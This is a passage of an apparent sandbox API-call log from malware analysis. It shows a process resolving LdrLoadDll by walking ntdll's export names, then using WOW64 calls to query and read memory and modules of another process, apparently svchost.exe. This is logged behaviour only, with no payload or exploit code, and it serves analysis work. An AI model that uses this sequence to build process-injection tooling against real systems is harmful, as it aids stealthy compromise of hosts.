lstrcmpA (lpString1="DbgPrintReturnControlC", lpString2="LdrLoadDll") returned -1 [0207.122] lstrcmpA (lpString1="DbgPrompt", lpString2="LdrLoadDll") returned -1 [0207.122] lstrcmpA (lpString1="DbgQueryDebugFilterState", lpString2="LdrLoadDll") returned -1 [0207.122] lstrcmpA (lpString1="DbgSetDebugFilterState", lpString2="LdrLoadDll") returned -1 [0207.122] lstrcmpA (lpString1="DbgUiConnectToDbg", lpString2="LdrLoadDll") returned -1 [0207.122] lstrcmpA (lpString1="DbgUiContinue", lpString2="LdrLoadDll") returned -1 [0207.122] lstrcmpA (lpString1="DbgUiConvertStateChangeStructure", lpString2="LdrLoadDll") returned -1 [0207.122] lstrcmpA (lpString1="DbgUiConvertStateChangeStructureEx", lpString2="LdrLoadDll") returned -1 [0207.122] lstrcmpA (lpString1="DbgUiDebugActiveProcess", lpString2="LdrLoadDll") returned -1 [0207.122] lstrcmpA (lpString1="DbgUiGetThreadDebugObject", lpString2="LdrLoadDll") returned -1 [0207.123] lstrcmpA (lpString1="DbgUiIssueRemoteBreakin", lpString2="LdrLoadDll") returned -1 [0207.123] lstrcmpA (lpString1="DbgUiRemoteBreakin", lpString2="LdrLoadDll") returned -1 [0207.123] lstrcmpA (lpString1="DbgUiSetThreadDebugObject", lpString2="LdrLoadDll") returned -1 [0207.123] lstrcmpA (lpString1="DbgUiStopDebugging", lpString2="LdrLoadDll") returned -1 [0207.123] lstrcmpA (lpString1="DbgUiWaitStateChange", lpString2="LdrLoadDll") returned -1 [0207.123] lstrcmpA (lpString1="DbgUserBreakPoint", lpString2="LdrLoadDll") returned -1 [0207.123] lstrcmpA (lpString1="EtwCreateTraceInstanceId", lpString2="LdrLoadDll") returned -1 [0207.123] lstrcmpA (lpString1="EtwDeliverDataBlock", lpString2="LdrLoadDll") returned -1 [0207.123] lstrcmpA (lpString1="EtwEnumerateProcessRegGuids", lpString2="LdrLoadDll") returned -1 [0207.123] lstrcmpA (lpString1="EtwEventActivityIdControl", lpString2="LdrLoadDll") returned -1 [0207.123] lstrcmpA (lpString1="EtwEventEnabled", lpString2="LdrLoadDll") returned -1 [0207.123] lstrcmpA (lpString1="EtwEventProviderEnabled", lpString2="LdrLoadDll") returned -1 [0207.123] lstrcmpA (lpString1="EtwEventRegister", lpString2="LdrLoadDll") returned -1 [0207.123] lstrcmpA (lpString1="EtwEventSetInformation", lpString2="LdrLoadDll") returned -1 [0207.123] lstrcmpA (lpString1="EtwEventUnregister", lpString2="LdrLoadDll") returned -1 [0207.123] lstrcmpA (lpString1="EtwEventWrite", lpString2="LdrLoadDll") returned -1 [0207.123] lstrcmpA (lpString1="EtwEventWriteEndScenario", lpString2="LdrLoadDll") returned -1 [0207.123] lstrcmpA (lpString1="EtwEventWriteEx", lpString2="LdrLoadDll") returned -1 [0207.123] lstrcmpA (lpString1="EtwEventWriteFull", lpString2="LdrLoadDll") returned -1 [0207.123] lstrcmpA (lpString1="EtwEventWriteNoRegistration", lpString2="LdrLoadDll") returned -1 [0207.123] lstrcmpA (lpString1="EtwEventWriteStartScenario", lpString2="LdrLoadDll") returned -1 [0207.123] lstrcmpA (lpString1="EtwEventWriteString", lpString2="LdrLoadDll") returned -1 [0207.123] lstrcmpA (lpString1="EtwEventWriteTransfer", lpString2="LdrLoadDll") returned -1 [0207.123] lstrcmpA (lpString1="EtwGetTraceEnableFlags", lpString2="LdrLoadDll") returned -1 [0207.123] lstrcmpA (lpString1="EtwGetTraceEnableLevel", lpString2="LdrLoadDll") returned -1 [0207.123] lstrcmpA (lpString1="EtwGetTraceLoggerHandle", lpString2="LdrLoadDll") returned -1 [0207.123] lstrcmpA (lpString1="EtwLogTraceEvent", lpString2="LdrLoadDll") returned -1 [0207.123] lstrcmpA (lpString1="EtwNotificationRegister", lpString2="LdrLoadDll") returned -1 [0207.123] lstrcmpA (lpString1="EtwNotificationUnregister", lpString2="LdrLoadDll") returned -1 [0207.123] lstrcmpA (lpString1="EtwProcessPrivateLoggerRequest", lpString2="LdrLoadDll") returned -1 [0207.123] lstrcmpA (lpString1="EtwRegisterSecurityProvider", lpString2="LdrLoadDll") returned -1 [0207.124] lstrcmpA (lpString1="EtwRegisterTraceGuidsA", lpString2="LdrLoadDll") returned -1 [0207.124] lstrcmpA (lpString1="EtwRegisterTraceGuidsW", lpString2="LdrLoadDll") returned -1 [0207.124] lstrcmpA (lpString1="EtwReplyNotification", lpString2="LdrLoadDll") returned -1 [0207.124] lstrcmpA (lpString1="EtwSendNotification", lpString2="LdrLoadDll") returned -1 [0207.124] lstrcmpA (lpString1="EtwSetMark", lpString2="LdrLoadDll") returned -1 [0207.124] lstrcmpA (lpString1="EtwTraceEventInstance", lpString2="LdrLoadDll") returned -1 [0207.124] lstrcmpA (lpString1="EtwTraceMessage", lpString2="LdrLoadDll") returned -1 [0207.124] lstrcmpA (lpString1="EtwTraceMessageVa", lpString2="LdrLoadDll") returned -1 [0207.124] lstrcmpA (lpString1="EtwUnregisterTraceGuids", lpString2="LdrLoadDll") returned -1 [0207.124] lstrcmpA (lpString1="EtwWriteUMSecurityEvent", lpString2="LdrLoadDll") returned -1 [0207.124] lstrcmpA (lpString1="EtwpCreateEtwThread", lpString2="LdrLoadDll") returned -1 [0207.124] lstrcmpA (lpString1="EtwpGetCpuSpeed", lpString2="LdrLoadDll") returned -1 [0207.124] lstrcmpA (lpString1="EvtIntReportAuthzEventAndSourceAsync", lpString2="LdrLoadDll") returned -1 [0207.124] lstrcmpA (lpString1="EvtIntReportEventAndSourceAsync", lpString2="LdrLoadDll") returned -1 [0207.124] lstrcmpA (lpString1="ExpInterlockedPopEntrySListEnd", lpString2="LdrLoadDll") returned -1 [0207.124] lstrcmpA (lpString1="ExpInterlockedPopEntrySListFault", lpString2="LdrLoadDll") returned -1 [0207.124] lstrcmpA (lpString1="ExpInterlockedPopEntrySListResume", lpString2="LdrLoadDll") returned -1 [0207.124] lstrcmpA (lpString1="KiRaiseUserExceptionDispatcher", lpString2="LdrLoadDll") returned -1 [0207.124] lstrcmpA (lpString1="KiUserApcDispatcher", lpString2="LdrLoadDll") returned -1 [0207.124] lstrcmpA (lpString1="KiUserCallbackDispatcher", lpString2="LdrLoadDll") returned -1 [0207.124] lstrcmpA (lpString1="KiUserExceptionDispatcher", lpString2="LdrLoadDll") returned -1 [0207.124] lstrcmpA (lpString1="KiUserInvertedFunctionTable", lpString2="LdrLoadDll") returned -1 [0207.124] lstrcmpA (lpString1="LdrAccessResource", lpString2="LdrLoadDll") returned -1 [0207.124] lstrcmpA (lpString1="LdrAddDllDirectory", lpString2="LdrLoadDll") returned -1 [0207.124] lstrcmpA (lpString1="LdrAddLoadAsDataTable", lpString2="LdrLoadDll") returned -1 [0207.124] lstrcmpA (lpString1="LdrAddRefDll", lpString2="LdrLoadDll") returned -1 [0207.124] lstrcmpA (lpString1="LdrAppxHandleIntegrityFailure", lpString2="LdrLoadDll") returned -1 [0207.124] lstrcmpA (lpString1="LdrDisableThreadCalloutsForDll", lpString2="LdrLoadDll") returned -1 [0207.124] lstrcmpA (lpString1="LdrEnumResources", lpString2="LdrLoadDll") returned -1 [0207.124] lstrcmpA (lpString1="LdrEnumerateLoadedModules", lpString2="LdrLoadDll") returned -1 [0207.124] lstrcmpA (lpString1="LdrFastFailInLoaderCallout", lpString2="LdrLoadDll") returned -1 [0207.124] lstrcmpA (lpString1="LdrFindEntryForAddress", lpString2="LdrLoadDll") returned -1 [0207.124] lstrcmpA (lpString1="LdrFindResourceDirectory_U", lpString2="LdrLoadDll") returned -1 [0207.124] lstrcmpA (lpString1="LdrFindResourceEx_U", lpString2="LdrLoadDll") returned -1 [0207.124] lstrcmpA (lpString1="LdrFindResource_U", lpString2="LdrLoadDll") returned -1 [0207.124] lstrcmpA (lpString1="LdrFlushAlternateResourceModules", lpString2="LdrLoadDll") returned -1 [0207.124] lstrcmpA (lpString1="LdrGetDllDirectory", lpString2="LdrLoadDll") returned -1 [0207.124] lstrcmpA (lpString1="LdrGetDllFullName", lpString2="LdrLoadDll") returned -1 [0207.125] lstrcmpA (lpString1="LdrGetDllHandle", lpString2="LdrLoadDll") returned -1 [0207.125] lstrcmpA (lpString1="LdrGetDllHandleByMapping", lpString2="LdrLoadDll") returned -1 [0207.125] lstrcmpA (lpString1="LdrGetDllHandleByName", lpString2="LdrLoadDll") returned -1 [0207.125] lstrcmpA (lpString1="LdrGetDllHandleEx", lpString2="LdrLoadDll") returned -1 [0207.125] lstrcmpA (lpString1="LdrGetDllPath", lpString2="LdrLoadDll") returned -1 [0207.125] lstrcmpA (lpString1="LdrGetFailureData", lpString2="LdrLoadDll") returned -1 [0207.125] lstrcmpA (lpString1="LdrGetFileNameFromLoadAsDataTable", lpString2="LdrLoadDll") returned -1 [0207.125] lstrcmpA (lpString1="LdrGetKnownDllSectionHandle", lpString2="LdrLoadDll") returned -1 [0207.125] lstrcmpA (lpString1="LdrGetProcedureAddress", lpString2="LdrLoadDll") returned -1 [0207.125] lstrcmpA (lpString1="LdrGetProcedureAddressEx", lpString2="LdrLoadDll") returned -1 [0207.125] lstrcmpA (lpString1="LdrGetProcedureAddressForCaller", lpString2="LdrLoadDll") returned -1 [0207.125] lstrcmpA (lpString1="LdrInitShimEngineDynamic", lpString2="LdrLoadDll") returned -1 [0207.125] lstrcmpA (lpString1="LdrInitializeThunk", lpString2="LdrLoadDll") returned -1 [0207.125] lstrcmpA (lpString1="LdrLoadAlternateResourceModule", lpString2="LdrLoadDll") returned -1 [0207.125] lstrcmpA (lpString1="LdrLoadAlternateResourceModuleEx", lpString2="LdrLoadDll") returned -1 [0207.125] lstrcmpA (lpString1="LdrLoadDll", lpString2="LdrLoadDll") returned 0 [0207.125] VirtualFree (lpAddress=0x2860000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.132] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x779b0000 [0207.132] GetProcAddress (hModule=0x779b0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77a1a840 [0207.132] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x1dc, ProcessInformationClass=0x0, ProcessInformation64=0x1eaf4f4, ProcessInformationLength=0x30, ReturnLength=0x1eaf548 | out: ProcessInformation64=0x1eaf4f4, ReturnLength=0x1eaf548) returned 0x0 [0207.132] VirtualAlloc (lpAddress=0x0, dwSize=0x6c4, flAllocationType=0x3000, flProtect=0x4) returned 0x160000 [0207.133] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x779b0000 [0207.133] GetProcAddress (hModule=0x779b0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77a1a840 [0207.133] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x1dc, ProcessInformationClass=0x0, ProcessInformation64=0x1eaf4f4, ProcessInformationLength=0x30, ReturnLength=0x1eaf548 | out: ProcessInformation64=0x1eaf4f4, ReturnLength=0x1eaf548) returned 0x0 [0207.133] StrRChrA (lpStart="C:\\Windows\\system32\\svchost.exe", lpEnd=0x0, wMatch=0x5c) returned="\\svchost.exe" [0207.133] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x93b03350, Buffer=0xb0, BufferSize=0x2343d28, NumberOfBytesRead=0x98 | out: Buffer=0xb0, NumberOfBytesRead=0x98) returned 0x0 [0207.133] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x93b03240, Buffer=0xb0, BufferSize=0x2343ab8, NumberOfBytesRead=0x3a | out: Buffer=0xb0, NumberOfBytesRead=0x3a) returned 0x0 [0207.133] StrRChrA (lpStart="C:\\Windows\\SYSTEM32\\ntdll.dll", lpEnd=0x0, wMatch=0x5c) returned="\\ntdll.dll" [0207.133] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x93b03990, Buffer=0xb0, BufferSize=0x2343d28, NumberOfBytesRead=0x98 | out: Buffer=0xb0, NumberOfBytesRead=0x98) returned 0x0 [0207.133] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x93b03b20, Buffer=0xb0, BufferSize=0x2343ab8, NumberOfBytesRead=0x40 | out: Buffer=0xb0, NumberOfBytesRead=0x40) returned 0x0 [0207.133] StrRChrA (lpStart="C:\\Windows\\system32\\KERNEL32.DLL", lpEnd=0x0, wMatch=0x5c) returned="\\KERNEL32.DLL" [0207.133] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x93b03e90, Buffer=0xb0, BufferSize=0x2343d28, NumberOfBytesRead=0x98 | out: Buffer=0xb0, NumberOfBytesRead=0x98) returned 0x0 [0207.133] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x93b04020, Buffer=0xb0, BufferSize=0x2343ab8, NumberOfBytesRead=0x44 | out: Buffer=0xb0, NumberOfBytesRead=0x44) returned 0x0 [0207.133] StrRChrA (lpStart="C:\\Windows\\system32\\KERNELBASE.dll", lpEnd=0x0, wMatch=0x5c) returned="\\KERNELBASE.dll" [0207.133] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x93b05200, Buffer=0xb0, BufferSize=0x2343d28, NumberOfBytesRead=0x98 | out: Buffer=0xb0, NumberOfBytesRead=0x98) returned 0x0 [0207.133] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x93b03920, Buffer=0xb0, BufferSize=0x2343ab8, NumberOfBytesRead=0x3e | out: Buffer=0xb0, NumberOfBytesRead=0x3e) returned 0x0 [0207.133] StrRChrA (lpStart="C:\\Windows\\system32\\sechost.dll", lpEnd=0x0, wMatch=0x5c) returned="\\sechost.dll" [0207.134] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x93b054b0, Buffer=0xb0, BufferSize=0x2343d28, NumberOfBytesRead=0x98 | out: Buffer=0xb0, NumberOfBytesRead=0x98) returned 0x0 [0207.134] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x93b05640, Buffer=0xb0, BufferSize=0x2343ab8, NumberOfBytesRead=0x3c | out: Buffer=0xb0, NumberOfBytesRead=0x3c) returned 0x0 [0207.134] StrRChrA (lpStart="C:\\Windows\\system32\\RPCRT4.dll", lpEnd=0x0, wMatch=0x5c) returned="\\RPCRT4.dll" [0207.134] lstrcmpiA (lpString1="svchost.exe", lpString2="NTDLL.DLL") returned 1 [0207.134] StrChrA (lpStart="svchost.exe", wMatch=0x2e) returned=".exe" [0207.134] lstrcmpiA (lpString1="svchost", lpString2="NTDLL.DLL") returned 1 [0207.134] lstrcmpiA (lpString1="ntdll.dll", lpString2="NTDLL.DLL") returned 0 [0207.134] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.134] VirtualAlloc (lpAddress=0x0, dwSize=0x1c2000, flAllocationType=0x3000, flProtect=0x4) returned 0x2860000 [0207.134] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f30000, Buffer=0x7ff9, BufferSize=0x2860000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.134] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f31000, Buffer=0x7ff9, BufferSize=0x2861000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.134] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f32000, Buffer=0x7ff9, BufferSize=0x2862000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.134] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f33000, Buffer=0x7ff9, BufferSize=0x2863000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.135] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f34000, Buffer=0x7ff9, BufferSize=0x2864000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.135] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f35000, Buffer=0x7ff9, BufferSize=0x2865000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.135] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f36000, Buffer=0x7ff9, BufferSize=0x2866000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.135] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f37000, Buffer=0x7ff9, BufferSize=0x2867000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.135] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f38000, Buffer=0x7ff9, BufferSize=0x2868000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.135] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f39000, Buffer=0x7ff9, BufferSize=0x2869000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.135] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f3a000, Buffer=0x7ff9, BufferSize=0x286a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.135] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f3b000, Buffer=0x7ff9, BufferSize=0x286b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.135] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f3c000, Buffer=0x7ff9, BufferSize=0x286c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.136] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f3d000, Buffer=0x7ff9, BufferSize=0x286d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.136] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f3e000, Buffer=0x7ff9, BufferSize=0x286e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.136] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f3f000, Buffer=0x7ff9, BufferSize=0x286f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.136] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f40000, Buffer=0x7ff9, BufferSize=0x2870000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.136] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f41000, Buffer=0x7ff9, BufferSize=0x2871000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.136] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f42000, Buffer=0x7ff9, BufferSize=0x2872000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.136] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f43000, Buffer=0x7ff9, BufferSize=0x2873000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.136] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f44000, Buffer=0x7ff9, BufferSize=0x2874000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.136] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f45000, Buffer=0x7ff9, BufferSize=0x2875000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.137] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f46000, Buffer=0x7ff9, BufferSize=0x2876000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.137] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f47000, Buffer=0x7ff9, BufferSize=0x2877000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.137] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f48000, Buffer=0x7ff9, BufferSize=0x2878000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.137] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f49000, Buffer=0x7ff9, BufferSize=0x2879000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.137] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f4a000, Buffer=0x7ff9, BufferSize=0x287a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.137] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f4b000, Buffer=0x7ff9, BufferSize=0x287b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.137] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f4c000, Buffer=0x7ff9, BufferSize=0x287c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.137] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f4d000, Buffer=0x7ff9, BufferSize=0x287d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.138] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f4e000, Buffer=0x7ff9, BufferSize=0x287e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.138] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f4f000, Buffer=0x7ff9, BufferSize=0x287f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.138] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f50000, Buffer=0x7ff9, BufferSize=0x2880000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.138] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f51000, Buffer=0x7ff9, BufferSize=0x2881000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.138] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f52000, Buffer=0x7ff9, BufferSize=0x2882000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.138] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f53000, Buffer=0x7ff9, BufferSize=0x2883000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.138] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f54000, Buffer=0x7ff9, BufferSize=0x2884000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.139] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f55000, Buffer=0x7ff9, BufferSize=0x2885000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.139] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f56000, Buffer=0x7ff9, BufferSize=0x2886000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.139] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f57000, Buffer=0x7ff9, BufferSize=0x2887000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.139] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f58000, Buffer=0x7ff9, BufferSize=0x2888000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.139] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f59000, Buffer=0x7ff9, BufferSize=0x2889000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.139] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f5a000, Buffer=0x7ff9, BufferSize=0x288a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.139] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f5b000, Buffer=0x7ff9, BufferSize=0x288b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.139] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f5c000, Buffer=0x7ff9, BufferSize=0x288c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.139] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f5d000, Buffer=0x7ff9, BufferSize=0x288d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.139] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f5e000, Buffer=0x7ff9, BufferSize=0x288e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.140] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f5f000, Buffer=0x7ff9, BufferSize=0x288f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.140] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f60000, Buffer=0x7ff9, BufferSize=0x2890000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.140] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f61000, Buffer=0x7ff9, BufferSize=0x2891000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.140] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f62000, Buffer=0x7ff9, BufferSize=0x2892000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.140] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f63000, Buffer=0x7ff9, BufferSize=0x2893000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.140] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f64000, Buffer=0x7ff9, BufferSize=0x2894000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.140] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f65000, Buffer=0x7ff9, BufferSize=0x2895000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.140] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f66000, Buffer=0x7ff9, BufferSize=0x2896000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.140] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f67000, Buffer=0x7ff9, BufferSize=0x2897000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.141] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, 